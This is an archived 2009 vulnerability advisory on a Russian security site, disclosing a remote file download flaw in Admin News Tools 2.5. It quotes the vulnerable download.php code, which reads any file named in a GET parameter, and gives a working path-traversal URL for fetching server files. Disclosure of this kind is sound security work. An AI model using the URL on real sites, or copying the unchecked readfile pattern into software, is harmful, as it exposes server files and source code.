Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [oCERT-2009-010] mimeTeX and mathTeX buffer overflows and command injection

  MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION --ILIAS LMS <= 3.10.7/3.9.9-->

  Virtualmin Multiple Vulnerabilities

  LifeType 1.2.8 Remote File Inclusion Vulnerability

From:info_(at)_securitylab.ir <info_(at)_securitylab.ir>
Date:16 июля 2009 г.
Subject:Admin News Tools 2.5 Remote File Download Vulnerability

######################### Securitylab.ir ########################
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===========================================================
# Download.php
# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород